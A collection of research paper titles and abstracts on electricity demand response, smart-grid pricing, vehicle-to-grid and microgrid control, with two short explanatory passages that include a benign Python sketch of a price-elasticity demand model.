paper_title: Real-time vehicle-to-grid control algorithm under price uncertainty paper_content: The vehicle-to-grid (V2G) system enables energy flow from the electric vehicles (EVs) to the grid. The distributed power of the EVs can either be sold to the grid or be used to provide frequency regulation service when V2G is implemented. A V2G control algorithm is necessary to decide whether the EV should be charged, discharged, or provide frequency regulation service in each hour. The V2G control problem is further complicated by the price uncertainty, where the electricity price is determined dynamically every hour. In this paper, we study the real-time V2G control problem under price uncertainty. We model the electricity price as a Markov chain with unknown transition probabilities and formulate the problem as a Markov decision process (MDP). This model features implicit estimation of the impact of future electricity prices and current control operation on long-term profits. 
The Q-learning algorithm is then used to adapt the control operation to the hourly available price in order to maximize the profit for the EV owner during the whole parking time. We evaluate our proposed V2G control algorithm using both the simulated price and the actual price from PJM in 2010. Simulation results show that our proposed algorithm can work effectively in the real electricity market and it is able to increase the profit significantly compared with the conventional EV charging scheme. --- paper_title: Distributed algorithms for control of demand response and distributed energy resources paper_content: This paper proposes distributed algorithms for control and coordination of loads and distributed energy resources (DERs) in distribution networks. These algorithms are relevant for load curtailment control in demand response programs, and also for coordination of DERs for provision of ancillary services. Both the distributed load-curtailment and DER coordination problems can be cast as distributed resource allocation problems with constraints on resource capacity. We focus on linear iterative algorithms in which each resource j maintains a set of values that is updated to be a weighted linear combination of the resource's own previous set of values and the previous sets of values of its neighboring resources. This set of values can be used by each node to determine its own contribution to load curtailment or to resource request. --- paper_title: Demand-Response Management for Dependable Power Grids paper_content: The national electricity markets in Europe, Asia, and the Americas are evolving towards decentralized structures mainly based on renewable energies, essentially rooted in political decisions to counter the worldwide climate change. The increase of production based on renewable energy implies drastically higher volatility in available electric power. The problem has two challenging facets, namely grid stability, and economy of energy production and consumption. Stability is a priority concern, because reliable energy is a prerequisite for economic use of energy, whether or not renewable. This asks for improved and better coordinated diagnostic and prediction techniques, as well as orchestrated demand-side mechanisms to counter critical grid or market situations. This typically does not save energy per se, it alters the consumption characteristics: peaks are shifted or certain load patterns are avoided. Demand-response mechanisms are event-driven reactions based on, for instance, frequency deviations or end user online pricing. With demand-response, consumption is temporarily reduced or increased, possibly even with reducing the respective customer service levels (e.g. indoor climate). The incentive for customers to participate in such programs is usually of monetary nature. This chapter explains the different types of demand-response, and discusses established and emerging technologies, focusing on mechanisms that operate decentralized, and without collecting information centrally. We compare a set of approaches that take up and combine ideas from communication protocol design, taking a flaw in the current German grid regulations as our prime motivation. --- paper_title: Potential-Function Based Control of a Microgrid in Islanded and Grid-Connected Modes paper_content: This paper introduces the potential-function based method for secondary (as well as tertiary) control of a microgrid, in both islanded and grid-connected modes. 
A potential function is defined for each controllable unit of the microgrid such that the minimum of the potential function corresponds to the control goal. The dynamic set points are updated, using communication within the microgrid. The proposed potential function method is applied for the secondary voltage control of two microgrids with single and multiple feeders. Both islanded and grid-connected modes are investigated. The studies are conducted in the time-domain, using the PSCAD/EMTDC software environment. The study results demonstrate feasibility of the proposed potential function method and viability of the secondary voltage control method for a microgrid. --- paper_title: Decentralized Demand-Side Contribution to Primary Frequency Control paper_content: Frequency in large power systems is usually controlled by adjusting the production of generating units in response to changes in the load. As the amount of intermittent renewable generation increases and the proportion of flexible conventional generating units decreases, a contribution from the demand side to primary frequency control becomes technically and economically desirable. One of the reasons why this has not been done was the perceived difficulties in dealing with many small loads rather than a limited number of generating units. In particular, the cost and complexity associated with two-way communications between many loads and the control center appeared to be insurmountable obstacles. This paper argues that this two-way communication is not essential and that the demand can respond to the frequency error in a manner similar to the generators. Simulation results show that, using this approach, the demand side can make a significant and reliable contribution to primary frequency response while preserving the benefits that consumers derive from their supply of electric energy. --- paper_title: Demand response with functional buildings using simplified process models paper_content: Smart Grids ideally interconnect intelligent grid members. One big share of grid presence is with buildings. Flexible and grid-friendly buildings would improve grid management and are an important contribution to the integration of renewable energy sources. Classical buildings, however, are passive and not cooperative. This article describes how electro-thermal processes in buildings can be used for demand response and how such intelligent behavior can be enabled via communication technology. Experiments and simulations on typical mid-European buildings were done to estimate the potential time constants. --- paper_title: Design Considerations of a Centralized Load Controller Using Thermostatically Controlled Appliances for Continuous Regulation Reserves paper_content: This paper presents design considerations for a centralized load controller to control thermostatically controlled appliances (TCAs) for continuous regulation reserves (CRRs). The controller logics for setting up the baseline load, generating priority lists, issuing dispatch commands, and tuning the simplified forecaster model using measurement data are described. To study the impacts of different control parameter settings on control performance and device lifetimes, a system consisting of 1000 heating, ventilating, and air-conditioning (HVAC) units in their heating modes is modeled to provide a CRR 24 hours a day. Four cases are modeled to evaluate the impact of forecasting errors, minimum HVAC turn-off times, response delays, and consumer overrides. 
The results demonstrate that a centralized TCA load controller can provide robust, good quality CRRs with reduced communication needs for the two-way communication network and inexpensive load control devices. Most importantly, because the controller precisely controls the aggregated HVAC load shapes while maintaining load diversity, the controllable and measurable load services that it provides can be used for many other demand response applications, such as peak shaving, load shifting, and arbitrage. --- paper_title: A Distributed Demand Response Algorithm and Its Application to PHEV Charging in Smart Grids paper_content: This paper proposes a distributed framework for demand response and user adaptation in smart grid networks. In particular, we borrow the concept of congestion pricing in Internet traffic control and show that pricing information is very useful to regulate user demand and hence balance network load. User preference is modeled as a willingness to pay parameter which can be seen as an indicator of differential quality of service. Both analysis and simulation results are presented to demonstrate the dynamics and convergence behavior of the algorithm. Based on this algorithm, we then propose a novel charging method for plug-in hybrid electric vehicles (PHEVs) in a smart grid, where users or PHEVs can adapt their charging rates according to their preferences. Simulation results are presented to demonstrate the dynamic behavior of the charging algorithm and impact of different parameters on system performance. --- paper_title: Active Load Control in Islanded Microgrids Based on the Grid Voltage paper_content: In the islanded operating condition, the microgrid has to maintain the power balance independently of a main grid. Because of the specific characteristics of the microgrid, such as the resistive lines and the high degree of power-electronically interfaced generators, new power control methods for the generators have been introduced. For the active power control in this paper, a variant of the conventional droop P/f control strategy is used, namely the voltage-droop controller. However, because of the small size of the microgrid and the high share of renewables with an intermittent character, new means of flexibility in power balancing are required to ensure stable operation. Therefore, a novel active load control strategy is presented in this paper. The aim is to render a proof of concept for this control strategy in an islanded microgrid. The active load control is triggered by the microgrid voltage level. The latter is enabled by using the voltage-droop control strategy and its specific properties. It is concluded that the combination of the voltage-droop control strategy with the presented demand dispatch allows reliable power supply without interunit communication for the primary control, leads to a more efficient usage of the renewable energy and can even lead to an increased share of renewables in the islanded microgrid. --- paper_title: Influence of variable supply and load flexibility on Demand-Side Management paper_content: Demand-Side Management (DSM) refers to the shaping of the electrical load to improve the fit with the supply side [1]. One way to achieve this is to confront the user with a dynamic financial incentive to influence the demand. In previous work (see [2]) a crude reactive pricing algorithm has been shown to shave the peak of the aggregated load by over 25%. In this paper this approach is extended and evaluated in more detail. 
The algorithm is extended to cover scenarios where the supply is no longer fixed; its performance is investigated under varying conditions such as the percentage of the flexible load as well as the extent of the load's flexibility. The expected benefit of applying the algorithm to real world scenarios is predicted, allowing for an informed decision on whether or not to employ it in specific situations and under which pricing conditions. --- paper_title: Simulating integrated volt/var control and distributed demand response using GridSpice paper_content: This paper proposes VVCDDR, an integrated volt/var control scheme which also uses distributed demand response capacity on distribution networks to improve the reliability and efficiency of the distribution network. The paper uses a new simulation platform, GridSpice, to show that demand response resources can be used to maintain a flat and stable voltage profile over the feeder without increasing the allocation of voltage regulators and capacitor banks. The improved voltage profile allows for a safe reduction of voltage while ensuring that all loads remain within the standard acceptable voltage range. Previous studies have shown that a reduction of the load voltage translates into lower power consumption, a technique known as conservation voltage reduction (CVR). The simulation platform, GridSpice, built on top of Gridlab-D [11], is the first distribution simulator to consider volt/var control, demand response, and distribution automation in a single simulation. --- paper_title: Residential Demand Response model and impact on voltage profile and losses of an electric distribution network paper_content: This paper develops a model for Demand Response (DR) by utilizing consumer behavior modeling considering different scenarios and levels of consumer rationality. Consumer behavior modeling has been done by developing extensive demand-price elasticity matrices for different types of consumers. These price elasticity matrices (PEMs) are utilized to calculate the level of Demand Response for a given consumer considering a day-ahead real time pricing scenario. DR models are applied to the IEEE 8500-node test feeder which is a real world large radial distribution network. A comprehensive analysis has been performed on the effects of demand reduction and redistribution on system voltages and losses. Results show that considerable DR can boost in system voltage due for further demand curtailment through demand side management techniques like Volt/Var Control (VVC). --- paper_title: Demand side management program evaluation based on industrial and commercial field data paper_content: Demand Response is increasingly viewed as an important tool for use by the electric utility industry in meeting the growing demand for electricity. There are two basic categories of demand response options: time varying retail tariffs and incentive Demand Response Programs. Electricity Saudi Company (ESC) is applying the time varying retail tariffs program, which is not suitable according to the studied load curves captured from the industrial and commercial sectors. Different statistical studies on daily load curves for consumers connected to 22kV lines are classified. The load curve criteria used for classification is based on peak ratio and night ratio. 
The data considered here is a set of 120 annual load curves corresponding to the electric power consumption (the western area of the Kingdom of Saudi Arabia (KSA)) of many clients in winter and some months in the summer (peak period). The study is based on real data from several Saudi customer sectors in many geographical areas with larger commercial and industrial customers. The study proved that the suitable Demand Response for the ESC is the incentive program. --- paper_title: Customer behavior based demand response model paper_content: An important benefit of demand response (DR) is the avoided need to build power plants to serve heightened demand that occurs in just a few hours per year. There are two basic categories of DR options: price-based and incentive-based DR programs. In this paper, both categories of DR measures are modeled based on the demand-price elasticity concept. It has been shown that customers' reactions to price-based and incentive-based DR programs are not similar, so that incentive-based programs have a key impact on customer habit formation in response to DR programs. An improved DR model is developed which considers the customer's behavior. The proposed model distinguishes between customers' behavior with respect to electricity price changes and their behavior with respect to variation of the incentive. The performance of the model has been justified by implementation on the IEEE reliability test system. --- paper_title: Impact of demand response contracts on load forecasting in a smart grid environment paper_content: Load forecasting is highly important for power system operation and planning. Demand response, as a valuable feature in smart grid, is growing dramatically as an effective demand management method. However, traditional load forecasting tools have limitations in reflecting demand response customer behaviors in load predictions. The energy consumption by demand response customers is mostly guided by their signed contracts. Therefore, existing demand response contracts are reviewed in this study for both wholesale and retail markets. An illustrative example is provided to explore the impact of these contracts on load forecasting. A concept of proactive load forecasting considering contract types is then proposed and discussed for forecasting loads in a smart grid environment. --- paper_title: Behavior Modification paper_content: This article describes how retail electricity demand can be made price-responsive through either dynamic, time-based retail pricing or DR programs offered by utilities and/or regional ISOs. Price-responsive demand (PRD) can provide the crucial link between wholesale and retail electricity markets that is missing under traditional fixed retail rates. Parties generally agree on the need for greater PRD to improve the efficiency of wholesale power markets. There is no mechanical formula for determining how much consumers will alter their usage patterns for any given event. Price response varies considerably across customers and it tends to be greater for customers with relatively high usage levels. Consumers can choose to save money by reducing consumption during periods of high prices or "buy through" at prices that reflect wholesale market conditions.
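Several of the behavior-modeling entries in this list (including the customer behavior model above and the elasticity-based prioritization and flexible-program models cited further on) rest on a demand-price elasticity matrix. The sketch below evaluates the standard self/cross-period relation d_i = d0_i * (1 + sum_j E_ij * (p_j - p0_j) / p0_j); the elasticity values and the flat versus time-of-use prices are illustrative assumptions, not parameters estimated in any of the cited studies.

```python
def responsive_demand(d0, p0, p, elasticity):
    """Demand after a price change, using a price-elasticity matrix.

    d_i = d0_i * (1 + sum_j E_ij * (p_j - p0_j) / p0_j)
    Diagonal entries are self-elasticities (negative: demand drops when
    the same period gets dearer); off-diagonal entries are
    cross-elasticities (positive: load shifts toward cheaper periods).
    """
    periods = range(len(d0))
    return [d0[i] * (1 + sum(elasticity[i][j] * (p[j] - p0[j]) / p0[j]
                             for j in periods))
            for i in periods]

# Three aggregated periods: valley, shoulder, peak (illustrative numbers).
d0 = [400.0, 600.0, 900.0]          # MW under the flat tariff
p0 = [60.0, 60.0, 60.0]             # flat price, $/MWh
p  = [30.0, 60.0, 120.0]            # assumed time-of-use price
E  = [[-0.10,  0.01,  0.03],        # assumed elasticity matrix
      [ 0.01, -0.10,  0.02],
      [ 0.03,  0.02, -0.15]]
for name, before, after in zip(["valley", "shoulder", "peak"], d0,
                               responsive_demand(d0, p0, p, E)):
    print(f"{name:9s} {before:7.1f} MW -> {after:7.1f} MW")
```

With these assumed numbers the peak-period demand falls and valley demand rises, which is the qualitative load-shape effect the elasticity-based DR models aim to capture.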
--- paper_title: Lessons learned from smart grid enabled pricing programs paper_content: Dynamic pricing is often considered an essential part of demand response programs, particularly when considering the advent of new consumer-facing technologies, which will eventually reshape the relationship between utility and consumer. This paper presents and analyzes case studies of several dynamic pricing programs, including different proposed rates, enabling technologies and incentives. Program successes are evaluated based on a combination of peak load reduction, customer bill impacts and customer satisfaction. An analysis of lessons learned is provided on how various factors can affect the success, scalability and applicability of smart grid demand response programs. --- paper_title: Residential response to critical-peak pricing of electricity: California evidence paper_content: This paper analyzes data from 483 households that took part in a critical-peak pricing (CPP) experiment between July and September 2004. Using a regression-based approach to quantify hourly baseline electric loads that would have occurred absent CPP events, we show a statistically significant average participant response in each hour. Average peak response estimates are provided for each of twelve experimental strata, by climate zone and building type. Results show that larger users respond more in both absolute and percentage terms, and customers in the coolest climate zone respond most as a percentage of their baseline load. Finally, an analysis involving the two different levels of critical-peak prices – $0.50/kWh and $0.68/kWh – indicates that households did not respond more to the higher CPP rate. --- paper_title: Modeling and prioritizing demand response programs in power markets paper_content: Abstract One of the responsibilities of power market regulator is setting rules for selecting and prioritizing demand response (DR) programs. There are many different alternatives of DR programs for improving load profile characteristics and achieving customers’ satisfaction. Regulator should find the optimal solution which reflects the perspectives of each DR stakeholder. Multi Attribute Decision Making (MADM) is a proper method for handling such optimization problems. In this paper, an extended responsive load economic model is developed. The model is based on price elasticity and customer benefit function. Prioritizing of DR programs can be realized by means of Technique for Order Preference by Similarity to Ideal Solution (TOPSIS) method. Considerations of ISO/utility/customer regarding the weighting of attributes are encountered by entropy method. An Analytical Hierarchy Process (AHP) is used for selecting the most effective DR program. Numerical studies are conducted on the load curve of the Iranian power grid in 2007. --- paper_title: The effect of utility time-varying pricing and load control strategies on residential summer peak electricity use: A review paper_content: Peak demand for electricity in North America is expected to grow, challenging electrical utilities to supply this demand in a cost-effective, reliable manner. Therefore, there is growing interest in strategies to reduce peak demand by eliminating electricity use, or shifting it to non-peak times. This strategy is commonly called "demand response". In households, common strategies are time-varying pricing, which charge more for energy use on peak, or direct load control, which allows utilities to curtail certain loads during high demand periods. 
We reviewed recent North American studies of these strategies. The data suggest that the most effective strategy is a critical peak price (CPP) program with enabling technology to automatically curtail loads on event days. There is little evidence that this causes substantial hardship for occupants, particularly if they have input into which loads are controlled and how, and have an override option. In such cases, a peak load reduction of at least 30% is a reasonable expectation. It might be possible to attain such load reductions without enabling technology by focusing on household types more likely to respond, and providing them with excellent support. A simple time-of-use (TOU) program can only expect to realise on-peak reductions of 5%. --- paper_title: Optimal Real-Time Pricing Algorithm Based on Utility Maximization for Smart Grid paper_content: In this paper, we consider a smart power infrastructure, where several subscribers share a common energy source. Each subscriber is equipped with an energy consumption controller (ECC) unit as part of its smart meter. Each smart meter is connected to not only the power grid but also a communication infrastructure such as a local area network. This allows two-way communication among smart meters. Considering the importance of energy pricing as an essential tool to develop efficient demand side management strategies, we propose a novel real-time pricing algorithm for the future smart grid. We focus on the interactions between the smart meters and the energy provider through the exchange of control messages which contain subscribers' energy consumption and the real-time price information. First, we analytically model the subscribers' preferences and their energy consumption patterns in form of carefully selected utility functions based on concepts from microeconomics. Second, we propose a distributed algorithm which automatically manages the interactions among the ECC units at the smart meters and the energy provider. The algorithm finds the optimal energy consumption levels for each subscriber to maximize the aggregate utility of all subscribers in the system in a fair and efficient fashion. Finally, we show that the energy provider can encourage some desirable consumption patterns among the subscribers by means of the proposed real-time pricing interactions. Simulation results confirm that the proposed distributed algorithm can potentially benefit both subscribers and the energy provider. --- paper_title: Demand response modeling considering Interruptible/Curtailable loads and capacity market programs paper_content: Recently, a massive focus has been made on demand response (DR) programs, aimed to electricity price reduction, transmission lines congestion resolving, security enhancement and improvement of market liquidity. Basically, demand response programs are divided into two main categories namely, incentive-based programs and time-based programs. The focus of this paper is on Interruptible/Curtailable service (I/C) and capacity market programs (CAP), which are incentive-based demand response programs including penalties for customers in case of no responding to load reduction. First, by using the concept of price elasticity of demand and customer benefit function, economic model of above mentioned programs is developed. The proposed model helps the independent system operator (ISO) to identify and employ relevant DR program which both improves the characteristics of the load curve and also be welcome by customers. 
To evaluate the performance of the model, simulation study has been conducted using the load curve of the peak day of the Iranian power system grid in 2007. In the numerical study section, the impact of these programs on load shape and load level, and benefit of customers as well as reduction of energy consumption are shown. In addition, by using strategy success indices the results of simulation studies for different scenarios are analyzed and investigated for determination of the scenarios priority. --- paper_title: Real-time pricing demand response in operations paper_content: Dynamic pricing schemes have been implemented in commercial and industrial application settings, and recently they are getting attention for application to residential customers. Time-of-use and critical-peak-pricing rates are in place in various regions and are being piloted in many more. These programs are proving themselves useful for balancing energy during peak periods; however, real-time (5 minute) pricing signals combined with automation in end-use systems have the potential to deliver even more benefits to operators and consumers. Besides system peak shaving, a real-time pricing system can contribute demand response based on the locational marginal price of electricity, reduce load in response to a generator outage, and respond to local distribution system capacity limiting situations. The US Department of Energy (DOE) is teaming with a mid-west electricity service provider to run a distribution feeder-based retail electricity market that negotiates with residential automation equipment and clears every 5 minutes, thus providing a signal for lowering or raising electric consumption based on operational objectives of economic efficiency and reliability. This paper outlines the capability of the real-time pricing system and the operational scenarios being tested as the system is rolled-out starting in the first half of 2012. --- paper_title: Demand response in electrical energy supply: An optimal real time pricing approach paper_content: In competitive electricity markets with deep concerns for the efficiency level, demand response programs gain considerable significance. As demand response levels have decreased after the introduction of competition in the power industry, new approaches are required to take full advantage of demand response opportunities. --- paper_title: The Value of Dynamic Pricing in Mass Markets paper_content: Abstract The simpler forms of dynamic pricing, in which prices vary only during extreme supply conditions, may capture many of the economic benefits of real-time pricing, and may be suitable for wide-scale deployment to mass-market consumers, for whom dynamic pricing options have largely been ignored. --- paper_title: Dynamic Pricing? Not So Fast! A Residential Consumer Perspective paper_content: With the installation of smart metering, will residential customers be moved to "dynamic" pricing? Some supporters of changing residential rate design from a fixed and stable rate structure believe customers should be required to take electric service with time-variant price signals. Not so fast, though! There are real implications associated with this strategy. --- paper_title: Coupon incentive-based demand response (CIDR) in smart grid paper_content: A new type of demand response (DR) program referred to as coupon incentive-based demand response (CIDR) is presented as an alternative to residential consumer demand response programs. 
Enabled by pervasive mobile communication capabilities and smart grid technologies, load serving entities (LSEs) could offer residential consumers coupon incentives to reduce power consumption in a given period of time, offsetting potential losses due to wholesale electricity price spikes. In contrast with real-time pricing or peak load pricing, CIDR program maintains simple flat retail rate structure on consumer side while providing effective voluntary-based incentives for DR. An iterative procedure is designed to realize the real-time interaction between the independent system operator, the LSEs and consumers. CIDR can increase the profit of the LSEs and achieve almost the same social welfare as under the real-time pricing scheme. CIDR is compatible with current flat retail rate pricing scheme so the implementation is straightforward. A numerical experiment demonstrates the potential benefits of CIDR programs. --- paper_title: The integration of Price Responsive Demand into Regional Transmission Organization (RTO) wholesale power markets and system operations paper_content: A number of states and utilities are pursuing demand response based on dynamic and time-differentiated retail prices and utility investments in Advanced Metering Infrastructure (AMI), often as part of Smart Grid initiatives. These developments could produce large amounts of Price Responsive Demand, demand that predictably responds to changes in wholesale prices. Price Responsive Demand could provide significant reliability and economic benefits. However, existing RTO tariffs present potential barriers to the development of Price Responsive Demand. Effectively integrating Price Responsive Demand into RTO markets and operations will require changes in demand forecasting, scarcity pricing reform, synchronization of scarcity pricing with capacity markets, tracking voluntary hedging by price responsive loads, and a non-discriminatory approach in curtailments in capacity emergencies. The article describes changes in RTO policies and systems needed incorporate Price Responsive Demand. --- paper_title: Demand Side Management: Demand Response, Intelligent Energy Systems, and Smart Loads paper_content: Energy management means to optimize one of the most complex and important technical creations that we know: the energy system. While there is plenty of experience in optimizing energy generation and distribution, it is the demand side that receives increasing attention by research and industry. Demand Side Management (DSM) is a portfolio of measures to improve the energy system at the side of consumption. It ranges from improving energy efficiency by using better materials, over smart energy tariffs with incentives for certain consumption patterns, up to sophisticated real-time control of distributed energy resources. This paper gives an overview and a taxonomy for DSM, analyzes the various types of DSM, and gives an outlook on the latest demonstration projects in this domain. --- paper_title: A probabilistic risk-based approach for spinning reserve provision using day-ahead demand response program paper_content: Spinning Reserve is one of the ancillary services which is essential to satisfy system security constraints when the power system faces with a contingency. In this paper, Day Ahead Demand Response Program as one of the incentive-based Demand Response programs is implemented as a source of spinning reserve. 
In this regard, a certain number of demands is selected according to a sensitivity analysis and simulated as virtual generation units. The reserve market is cleared for Spinning Reserve allocation considering a probabilistic technique. A comparison is performed between the absence and presence of the Day-Ahead Demand Response Program from both economic and reliability viewpoints. Numerical studies based on the IEEE 57-bus test system are conducted to evaluate the proposed method. --- paper_title: Optimal Scheduling of Demand Response Events for Electric Utilities paper_content: Electric utilities have been investigating methods to reduce peak power demand. Demand response (DR) is one such method which intends to reduce peak electricity demand. DR programs typically have limits on the number and timing of events that may be triggered for a selected group of customers. This paper presents a methodology for optimizing the scheduling of DR events for various DR programs. The proposed optimization mechanism establishes a policy that triggers DR events according to the criteria that govern the cost to the utility and based on probability distributions of exogenous information that is accessible to utilities a priori, for decision making. The policy determines a dynamic threshold for triggering events that optimizes the expected savings over the planning horizon. Case studies using real utility data show that our solutions are better than current industrial practices, and close to ex-post optimality. --- paper_title: Price it Right: Household Response to a Time-of-Use Electricity Pricing Experiment in Auckland, New Zealand paper_content: (front matter only; no abstract recovered) --- paper_title: Smart grid technologies and applications for the industrial sector paper_content: Smart grids have become a topic of intensive research, development, and deployment across the world over the last few years. The engagement of consumer sectors—residential, commercial, and industrial—is widely acknowledged as crucial for the projected benefits of smart grids to be realized. Although the industrial sector has traditionally been involved in managing power use with what today would be considered smart grid technologies, these applications have mostly been one-of-a-kind, requiring substantial customization. Our objective in this article is to motivate greater interest in smart grid applications in industry. We provide an overview of smart grids and of electricity use in the industrial sector. Several smart grid technologies are outlined, and automated demand response is discussed in some detail. Case studies from aluminum processing, cement manufacturing, food processing, industrial cooling, and utility plants are reviewed. Future directions in interoperable standards, advances in automated demand response, energy use optimization, and more dynamic markets are discussed. --- paper_title: Flexible demand response programs modeling in competitive electricity markets paper_content: In recent years, extensive research has been conducted on the implementation of demand response programs (DRPs), aimed at reducing electricity prices, relieving transmission congestion, enhancing security, and improving market liquidity. Basically, DRPs are divided into two main categories, namely incentive-based programs (IBPs) and time-based rate programs (TBRPs).
Mathematical modeling of these programs helps regulators and market policy makers to evaluate the impact of price responsive loads on the market and system operational conditions. In this paper, an economic model of price/incentive responsive loads is derived based on the concept of flexible price elasticity of demand and customer benefit function. The mathematical model for flexible price elasticity of demand is presented to calculate each of the demand response (DR) program’s elasticity based on the electricity price before and after implementing DRPs. In the proposed model, a demand ratio parameter has been introduced to determine the appropriate values of incentive and penalty in IBPs according to the level of demand. Furthermore, the importance of determining optimum participation level of customers in different DRPs has been investigated. The proposed model together with the strategy success index (SSI) has been applied to provide an opportunity for major players of the market, i.e. independent system operator (ISO), utilities and customers to select their favorite programs that satisfy their desires. In order to evaluate the performance of the proposed model, numerical studies are conducted on the Iranian interconnected network load profile on the annual peak day of the year 2007. --- paper_title: Residential Customer Response to Real-time Pricing: The Anaheim Critical Peak Pricing Experiment paper_content: This paper analyzes the results of a critical peak pricing (CPP) experiment involving 123 residential customers of the City of Anaheim Public Utilities (APU) over the period June 1, 2005 to October 14, 2005. Using a nonparametric condition mean estimation framework that allows for customer-specific fixed effects and day-of-sample fixed effects, I find that customers in the treatment group consumed an average of 12 percent less electricity during the peak hours of the day on CPP days than customers in the control group. There is also evidence that this reduction in consumption for customers in the treatment group relative to customers in the control group is larger on higher temperature CPP days. The impact of CPP events is confined to the peak periods of CPP days. Mean electricity consumption by customers in the treatment group is not significantly different from that of customers in the control group during the peak or off-peak periods of the day before or day after a CPP event. Much of the estimated consumption reduction of treatment consumers relative to control group consumers during peak periods of CPP days is due to reductions from a higher level of consumption by treatment group customers in non-CPP days. The consumption reductions paid rebates during CPP days are almost 7 times the reduction in consumption due to CPP events predicted by the treatment effects estimate, which provides strong evidence of an overly generous method for setting the reference level for peak period consumption relative to which customers are issued refunds during CPP days. The paper closes with a discussion of the challenges associated with implementing a CPP rate with a rebate mechanism as the default rate for residential customers. 
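The elasticity-based demand response models described above (flexible price elasticity of demand with self- and cross-elasticities between periods) can be illustrated with a short numerical sketch. The following Python fragment shows only the generic linear elasticity formulation, not the model of any single cited paper; the baseline demand, tariffs, and elasticity matrix are invented values, and the incentive or penalty terms used in incentive-based programs could be added to the price deviation in the same way.

# Illustrative sketch of a price-elasticity-based responsive load model.
# All numbers (baseline load, tariffs, elasticity matrix) are invented;
# real studies estimate them from customer data.

def responsive_demand(d0, p0, p, E):
    """d[i] = d0[i] * (1 + sum_j E[i][j] * (p[j] - p0[j]) / p0[j])"""
    n = len(d0)
    return [d0[i] * (1.0 + sum(E[i][j] * (p[j] - p0[j]) / p0[j] for j in range(n)))
            for i in range(n)]

# Three aggregated periods: valley, off-peak, peak.
d0 = [400.0, 700.0, 1000.0]      # baseline demand (MW)
p0 = [30.0, 30.0, 30.0]          # flat tariff ($/MWh)
p  = [20.0, 30.0, 60.0]          # time-of-use tariff ($/MWh)
E  = [[-0.10, 0.010, 0.012],     # self-elasticities (diagonal, negative)
      [0.010, -0.10, 0.016],     # cross-elasticities (off-diagonal, positive)
      [0.012, 0.016, -0.10]]

print(responsive_demand(d0, p0, p, E))   # peak demand falls, valley demand rises

Under these illustrative numbers the peak-period demand drops by roughly ten percent while valley demand rises slightly, which is the load-shifting behaviour the elasticity matrices are meant to capture.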
--- paper_title: Communication limitations in iterative real time pricing for power systems paper_content: Iterative, or negotiated, pricing mechanisms have been of interest for decades as a systematic means of operating electricity markets, and have more recently been proposed as a way of dealing with the increased diversity of responsive market participants brought about by smart grid technologies and the increasing share of intermittent energy sources. One possibility is for the market coordinator to communicate iteratively with market participants to determine energy prices, on a receding horizon basis. Until now, little work has been carried out on the practicalities of implementing such pricing mechanisms, and yet because a market outcome must be cleared in real time, adequate communication speed and reliability is essential. The authors present a model of lossy and delayed communication over a network for such a negotiated pricing mechanism, derived from practical consideration of message timing, collection strategies and security. The convergence of the algorithm to an optimal dispatch is shown to be quite robust to frequent communication failures and delays. Results are demonstrated for price negotiation over a 20-step time horizon on a densely-populated IEEE 39 bus network. --- paper_title: A day-ahead electricity pricing model based on smart metering and demand-side management paper_content: Several factors support more deployment of real-time pricing (RTP); including recent developments in the area of smart metering, regulators interest in promoting demand response programs and well-organized electricity markets. This paper first reviews time-based electricity pricing and the main barriers and issues to fully unleash benefits of RTP programs. Then, a day-ahead real-time pricing (DA-RTP) model is proposed, which addresses some of these issues. The proposed model can assist a retail energy provider and/or a distribution company (DISCO) to offer optimal DA hourly prices using smart metering. The real-time prices are determined through an optimization problem which seeks to maximize the electricity provider's profit, while considering consumers' benefit, minimum daily energy consumption, consumer response to posted electricity prices, and distribution network constraints. The numerical results associated with Ontario electricity tariffs indicate that instead of directly posting DA market prices to consumers, it would be better to calculate optimal prices which would yield higher benefit both for the energy provider and consumers. --- paper_title: Optimal energy consumption scheduling using mechanism design for the future smart grid paper_content: In the future smart grid, both users and power companies can benefit from real-time interactions and pricing methods which can reflect the fluctuations of the wholesale price into the demand side. In addition, smart pricing can be used to seek social benefits and to achieve social objectives. However, the utility company may need to collect various information about users and their energy consumption behavior, which can be challenging. That is, users may not be willing to reveal their local information unless there is an incentive for them to do so. In this paper, we propose an efficient pricing algorithm to tackle this problem. The benefit that each user obtains from each appliance can be modeled in form of a utility function, a concept from microeconomics. 
We propose a Vickrey-Clarke-Groves (VCG) based mechanism for our problem formulation aiming to maximize the social welfare, i.e., the aggregate utility functions of all users minus the total energy cost. Our design requires that each user provides some information about its energy demand. In return, the energy provider will determine each user's payment for electricity. The payment of each user is structured in such a way that it is in each user's self interest to reveal its local information truthfully. Finally, we present simulation results to show that both the energy provider and the individual users can benefit from the proposed pricing algorithm. --- paper_title: The role of incentive based Demand Response programs in smart grid paper_content: Smart Grid promises the highest efficiency in the history of electrical energy and one of its key components is Demand Response (DR). Incentive based programs however would have a different path in smart grid and their usage would be different in this new environment. In this paper, incentive based DR programs are briefly introduced, smart grid is presented and the influence of smart grid on incentive based DR programs is described considering the effect of Real Time Pricing (RTP). Finally, an existing model has been upgraded in order to analyze incentive based programs in smart grid. Eventually the influence of a typical demand bidding program is simulated on the load curve of a day in smart grid in the presence of RTP program. --- paper_title: Demand Response Scheduling by Stochastic SCUC paper_content: Considerable developments in the real-time telemetry of demand-side systems allow independent system operators (ISOs) to use reserves provided by demand response (DR) in ancillary service markets. Currently, many ISOs have designed programs to utilize the reserve provided by DR in electricity markets. This paper presents a stochastic model to schedule reserves provided by DR in the wholesale electricity markets. Demand-side reserve is supplied by demand response providers (DRPs), which have the responsibility of aggregating and managing customer responses. A mixed-integer representation of reserve provided by DRPs and its associated cost function are used in the proposed stochastic model. The proposed stochastic model is formulated as a two-stage stochastic mixed-integer programming (SMIP) problem. The first-stage involves network-constrained unit commitment in the base case and the second-stage investigates security assurance in system scenarios. The proposed model would schedule reserves provided by DRPs and determine commitment states of generating units and their scheduled energy and spinning reserves in the scheduling horizon. The proposed approach is applied to two test systems to illustrate the benefits of implementing demand-side reserve in electricity markets. --- paper_title: Demand-Side Bidding Agents: Modeling and Simulation paper_content: Problems such as price volatility have been observed in electric power markets. Demand-side participation is frequently offered as a potential solution by promising to increase market efficiency when hockey-stick-type offer curves are present. However, the individual end-consumer will surely value electricity differently, which makes demand-side participation difficult as a group and at a bus. In this paper demand is categorized into two groups: one that highly values reliability and one that does not. 
